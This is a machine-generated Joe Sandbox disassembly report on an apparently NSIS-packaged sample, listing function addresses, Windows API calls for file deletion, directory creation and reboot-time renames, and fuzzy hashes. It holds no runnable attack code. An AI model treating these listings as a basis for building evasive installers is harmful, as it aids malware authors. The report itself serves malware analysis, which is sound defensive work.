Associated: 00000000.00000002.2020247233.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020551896.0000000000873000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wfJfUGeGT3.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
Instruction ID: a3bc5d39330dd194e4c7332763fdc94ca13499671d705f1c19c6925397c50364
Opcode Fuzzy Hash: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
Instruction Fuzzy Hash: C8E08C32550118BFCB109EA69C40EE73B5CFB047A2F00C832BD55E5290DA30DA00EBE8

Function 004037E2 Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040604E: CharNextW.USER32(?,*?|<>/":,00000000,008560C8,008420A0,008560C8,00000000,004037EE,008560C8,-00000002,00403A21), ref: 004060B1
Part of subcall function 0040604E: CharNextW.USER32(?,?,?,00000000), ref: 004060C0
Part of subcall function 0040604E: CharNextW.USER32(?,008560C8,008420A0,008560C8,00000000,004037EE,008560C8,-00000002,00403A21), ref: 004060C5
Part of subcall function 0040604E: CharPrevW.USER32(?,?,008420A0,008560C8,00000000,004037EE,008560C8,-00000002,00403A21), ref: 004060D9

CreateDirectoryW.KERNELBASE(008560C8,00000000,008560C8,008560C8,008560C8,-00000002,00403A21), ref: 00403803

Memory Dump Source

Source File: 00000000.00000002.2020201383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2020186399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020218138.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020551896.0000000000873000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wfJfUGeGT3.jbxd

Similarity

API ID: Char$Next$CreateDirectoryPrev
String ID:
API String ID: 4115351271-0
Opcode ID: 6aaccbf0f4c256e95583d3efcb425cbe1f8ad9d91dfce7af8f321156cb5e1b29
Instruction ID: b75284c5955f365d0d9c4c727e495e4f3aae82af695c09dbce3dc5899ee9d583
Opcode Fuzzy Hash: 6aaccbf0f4c256e95583d3efcb425cbe1f8ad9d91dfce7af8f321156cb5e1b29
Instruction Fuzzy Hash: CBD0C751143D3061D5A1336A7D06FCF0D4DAF5271AB06407BF945B71C29E7C065A45FE

Function 00403368 Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403770,?,?,?,?,00000000,00403A5D,?), ref: 00403376

Memory Dump Source

Source File: 00000000.00000002.2020201383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2020186399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020218138.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020551896.0000000000873000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wfJfUGeGT3.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
Instruction ID: da19c3e449f5d10d282cbd9bcc1d8f2f369397d5e390659c1e8fea63e82898b0
Opcode Fuzzy Hash: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
Instruction Fuzzy Hash: 0CB09231140204AEDA214B109E05F067A21FB94700F208824B2A0380F086711420EA0C

Non-executed Functions

Function 00406CB1 Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 190filestringCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?), ref: 00406CCE
lstrcatW.KERNEL32(007DB150,\*.*), ref: 00406D1F
lstrcatW.KERNEL32(?,00408838), ref: 00406D3F
lstrlenW.KERNEL32(?), ref: 00406D42
FindFirstFileW.KERNEL32(007DB150,?), ref: 00406D56
FindNextFileW.KERNEL32(?,?,000000F2,?), ref: 00406E38
FindClose.KERNEL32(?), ref: 00406E49

Strings

\*.*, xrefs: 00406D19
RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E6E
Delete: DeleteFile failed("%s"), xrefs: 00406E13
RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EA9
RMDir: RemoveDirectory failed("%s"), xrefs: 00406EC6
Delete: DeleteFile("%s"), xrefs: 00406DD2
RMDir: RemoveDirectory("%s"), xrefs: 00406E85
Delete: DeleteFile on Reboot("%s"), xrefs: 00406DF6

Memory Dump Source

Source File: 00000000.00000002.2020201383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2020186399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020218138.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020551896.0000000000873000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wfJfUGeGT3.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*
API String ID: 2035342205-3294556389
Opcode ID: 4b1b557670e2683e68bec861c381546d6e6092d77848359203819f0ab52b989c
Instruction ID: 0e06370173042cf1970d3b282d3fdac29725624d265da3f13fe54d6ba55e86a8
Opcode Fuzzy Hash: 4b1b557670e2683e68bec861c381546d6e6092d77848359203819f0ab52b989c
Instruction Fuzzy Hash: EE51F435904305AACB217B65CD46ABF37B8DF41724F16813FF902751C1DB3C49A29AAD

Function 0040681B Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 212stringCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(007B9A60,?,00000000,00404FBF,007B9A60,00000000,00427150,0041F150,00000000), ref: 004068EC
GetSystemDirectoryW.KERNEL32(007E0D60,00002004), ref: 0040696E

Part of subcall function 0040601F: lstrcpynW.KERNEL32(?,?,00002004,00403907,007E95E0,NSIS Error), ref: 0040602C

GetWindowsDirectoryW.KERNEL32(007E0D60,00002004), ref: 00406981
lstrcatW.KERNEL32(007E0D60,\Microsoft\Internet Explorer\Quick Launch), ref: 004069FB
lstrlenW.KERNEL32(007E0D60,007B9A60,?,00000000,00404FBF,007B9A60,00000000,00427150,0041F150,00000000), ref: 00406A5D

Strings

`~, xrefs: 00406842
\Microsoft\Internet Explorer\Quick Launch, xrefs: 004069F5
`~, xrefs: 00406A69
Software\Microsoft\Windows\CurrentVersion, xrefs: 0040693C

Memory Dump Source

Source File: 00000000.00000002.2020201383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2020186399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020218138.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020551896.0000000000873000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wfJfUGeGT3.jbxd

Similarity

API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$`~$`~
API String ID: 3581403547-450655766
Opcode ID: 374e0595bb97e7487ac609e740c3c1fde53312a0c63930343963d002ff647ad1
Instruction ID: f0e19f9528a57ac158c9a3c92ca4e3ea7bb27298c0fdca1021e2216b23c4434f
Opcode Fuzzy Hash: 374e0595bb97e7487ac609e740c3c1fde53312a0c63930343963d002ff647ad1
Instruction Fuzzy Hash: 9771F3B1A00215EBDF20AF69CC456BA3774AB55714F12C03FE902BA2D0D73D89A1DF99

Function 00407577 Relevance: .6, Instructions: 628COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2020201383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2020186399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020218138.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020551896.0000000000873000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wfJfUGeGT3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65dabb3e933bcef0ed0642d24bd0ae254dba7200c983b735164db606a1674a6a
Instruction ID: 27a4fad9cef60e4803cbff8213b55d1ca64cbec4a5672e8aa3d352da4673dde9
Opcode Fuzzy Hash: 65dabb3e933bcef0ed0642d24bd0ae254dba7200c983b735164db606a1674a6a
Instruction Fuzzy Hash: 03429E71D08249DFDB15CF59C8806EEBBB5EF14318F14807BDC49AB286D338A946CB66

Function 0040548F Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054CB
ShowWindow.USER32(?), ref: 004054E8
DestroyWindow.USER32 ref: 004054FC
SetWindowLongW.USER32(?,00000000,00000000), ref: 00405518
GetDlgItem.USER32(?,?), ref: 00405539
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 0040554D
IsWindowEnabled.USER32(00000000), ref: 00405554
GetDlgItem.USER32(?,00000001), ref: 00405603
GetDlgItem.USER32(?,00000002), ref: 0040560D
SetClassLongW.USER32(?,000000F2,?), ref: 00405627
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00405678
GetDlgItem.USER32(?,00000003), ref: 0040571E
ShowWindow.USER32(00000000,?), ref: 00405740
EnableWindow.USER32(?,?), ref: 00405752
EnableWindow.USER32(?,?), ref: 0040576D
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405783
EnableMenuItem.USER32(00000000), ref: 0040578A
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057A2
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057B5
lstrlenW.KERNEL32(007C5A78,?,007C5A78,007E95E0), ref: 004057DE
SetWindowTextW.USER32(?,007C5A78), ref: 004057F2
ShowWindow.USER32(?,0000000A), ref: 00405926

Strings

xZ|, xrefs: 004057CF

Memory Dump Source

Source File: 00000000.00000002.2020201383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2020186399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020218138.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020551896.0000000000873000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wfJfUGeGT3.jbxd

Similarity

API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
String ID: xZ|
API String ID: 184305955-3158599731
Opcode ID: 699d8c8571f480e4bdb3d36bb1bab13dd0e7c30a2805178f501066c7cc38f012
Instruction ID: faf43565c4180cbf528e331297302c0a9f4643a65f382e9c74acaf045be3f04a
Opcode Fuzzy Hash: 699d8c8571f480e4bdb3d36bb1bab13dd0e7c30a2805178f501066c7cc38f012
Instruction Fuzzy Hash: A3C19C71401A04FFCB216F61EE89E2B3B69EB49345F40853EF642B52F0CA3A98519F1D

Function 00406AAF Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 163filestringmemoryCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(007D9B00,NUL), ref: 00406ABF
CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00406CA6,?,?,00000001,00406EC4,?,00000000,000000F1,?), ref: 00406ADE
GetShortPathNameW.KERNEL32(?,007D9B00,00000400), ref: 00406AE7

Part of subcall function 00405DCC: lstrlenA.KERNEL32(00406BE9,?,00000000,00000000,?,00000000,00406BE9,00000000,[Rename]), ref: 00405DDC
Part of subcall function 00405DCC: lstrlenA.KERNEL32(00000000,?,00000000,00406BE9,00000000,[Rename]), ref: 00405E0E

GetShortPathNameW.KERNEL32(?,007DF158,00000400), ref: 00406B08
WideCharToMultiByte.KERNEL32(00000000,00000000,007D9B00,000000FF,007DA300,00000400,00000000,00000000,?,00000000,?,00406CA6,?,?,00000001,00406EC4), ref: 00406B31
WideCharToMultiByte.KERNEL32(00000000,00000000,007DF158,000000FF,007DA950,00000400,00000000,00000000,?,00000000,?,00406CA6,?,?,00000001,00406EC4), ref: 00406B49
wsprintfA.USER32 ref: 00406B63
GetFileSize.KERNEL32(00000000,00000000,007DF158,C0000000,00000004,007DF158,?), ref: 00406B9B
GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BAA
ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BC6
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406BF6
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,007DAD50,00000000,-0000000A,0040987C,00000000,[Rename]), ref: 00406C4D

Part of subcall function 00405E66: GetFileAttributesW.KERNELBASE(00000003,004035DD,0085E0D8,80000000,00000003,?,?,?,00000000,00403A5D,?), ref: 00405E6A
Part of subcall function 00405E66: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A5D,?), ref: 00405E8C

WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C61
GlobalFree.KERNEL32(00000000), ref: 00406C68
CloseHandle.KERNEL32(?), ref: 00406C72

Strings

%s=%s, xrefs: 00406B59
NUL, xrefs: 00406AB4
[Rename], xrefs: 00406BDE, 00406BED

Memory Dump Source

Source File: 00000000.00000002.2020201383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2020186399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020218138.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020551896.0000000000873000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wfJfUGeGT3.jbxd

Similarity

API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
String ID: %s=%s$NUL$[Rename]
API String ID: 565278875-4148678300
Opcode ID: 1114a109490fbdc9d9cd55ac8155771844d87d5164aa3d9ff1e3f2f03f1a6129
Instruction ID: 9e8937d24cbcc237378a1661f1c9ec94e544457fac856d3cc281a3c4cf2fe410
Opcode Fuzzy Hash: 1114a109490fbdc9d9cd55ac8155771844d87d5164aa3d9ff1e3f2f03f1a6129
Instruction Fuzzy Hash: 80412772108209BFD6202B71DE8CD6B3A6CEF4A754B16053EF286F22D1DA389815867D

Function 004060FD Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72filestringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062EA,00000000), ref: 00406114
GetFileAttributesW.KERNEL32(007E8D80,?,00000000,00000000,?,?,004062EA,00000000), ref: 00406152
WriteFile.KERNEL32(00000000,000000FF,00000002,?,00000000,007E8D80,40000000,00000004,?,?,004062EA,00000000), ref: 0040618B
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,007E8D80,40000000,00000004,?,?,004062EA,00000000), ref: 00406197
lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00409678), ref: 004061B1
lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,004062EA,00000000), ref: 004061B8
WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,?,00000000,?,?,004062EA,00000000), ref: 004061CD

Strings

RMDir: RemoveDirectory invalid input(""), xrefs: 004061AB, 004061B0, 004061B7, 004061C6

Memory Dump Source

Source File: 00000000.00000002.2020201383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2020186399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020218138.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020551896.0000000000873000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wfJfUGeGT3.jbxd

Similarity

API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
String ID: RMDir: RemoveDirectory invalid input("")
API String ID: 3734993849-2769509956
Opcode ID: 53c63a071f7c75f6cc39809f4cfc821ae677a8637f79a140c0a1ee0d9f50a72e
Instruction ID: 63b6af9be1db431a2b362d5c3b596523b37325ffd0be647115a0f8ea25bc4e05
Opcode Fuzzy Hash: 53c63a071f7c75f6cc39809f4cfc821ae677a8637f79a140c0a1ee0d9f50a72e
Instruction Fuzzy Hash: D921C571500244BFD7109F64DE89D9B3728EB01370B11C33AF52ABA1E1D7385D858BAC

Function 00404F88 Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(007B9A60,00427150,0041F150,00000000), ref: 00404FC0
lstrlenW.KERNEL32(004034C5,007B9A60,00427150,0041F150,00000000), ref: 00404FD0
lstrcatW.KERNEL32(007B9A60,004034C5), ref: 00404FE3
SetWindowTextW.USER32(007B9A60,007B9A60), ref: 00404FF5
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040501B
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405035
SendMessageW.USER32(?,00001013,?,00000000), ref: 00405043

Part of subcall function 0040681B: GetVersion.KERNEL32(007B9A60,?,00000000,00404FBF,007B9A60,00000000,00427150,0041F150,00000000), ref: 004068EC

Memory Dump Source

Source File: 00000000.00000002.2020201383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2020186399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020218138.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020551896.0000000000873000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wfJfUGeGT3.jbxd

Similarity

API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
String ID:
API String ID: 2740478559-0
Opcode ID: 14e0322028ff1b5cf2a02c776065e56adf75eebd84e0f2ede120a82dc9a55bcd
Instruction ID: be30987b008cdac283f352a72c5daf1bc185fc6a717e9f44ce2e47ebc7ce0ac4
Opcode Fuzzy Hash: 14e0322028ff1b5cf2a02c776065e56adf75eebd84e0f2ede120a82dc9a55bcd
Instruction Fuzzy Hash: BF219D71800118BBCF12AFA5DD849DEBFB8EF45350F10803AFA04B62A0D7794A50DB98

Function 0040324C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
MulDiv.KERNEL32(00022600,00000064,00158B79), ref: 00403295
wsprintfW.USER32 ref: 004032A5
SetWindowTextW.USER32(?,?), ref: 004032B5
SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7

Strings

verifying installer: %d%%, xrefs: 0040329F

Memory Dump Source

Source File: 00000000.00000002.2020201383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2020186399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020218138.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020551896.0000000000873000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wfJfUGeGT3.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 0927bb4ed48fc27ce86c7514204bd566bf0cfbbf84362ab54b8100dd2a89eb04
Instruction ID: 9fbafa62008f9a5ff2b290cb2ce3c23c2df22ed1ca64675581df3bb266551b9d
Opcode Fuzzy Hash: 0927bb4ed48fc27ce86c7514204bd566bf0cfbbf84362ab54b8100dd2a89eb04
Instruction Fuzzy Hash: BB014470610209ABEF109F60DD59FAA3B69FB00349F00803DFA45B91E0DB7896558B58

Function 0040604E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,008560C8,008420A0,008560C8,00000000,004037EE,008560C8,-00000002,00403A21), ref: 004060B1
CharNextW.USER32(?,?,?,00000000), ref: 004060C0
CharNextW.USER32(?,008560C8,008420A0,008560C8,00000000,004037EE,008560C8,-00000002,00403A21), ref: 004060C5
CharPrevW.USER32(?,?,008420A0,008560C8,00000000,004037EE,008560C8,-00000002,00403A21), ref: 004060D9

Strings

*?|<>/":, xrefs: 004060A0

Memory Dump Source

Source File: 00000000.00000002.2020201383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2020186399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020218138.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2020247233.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
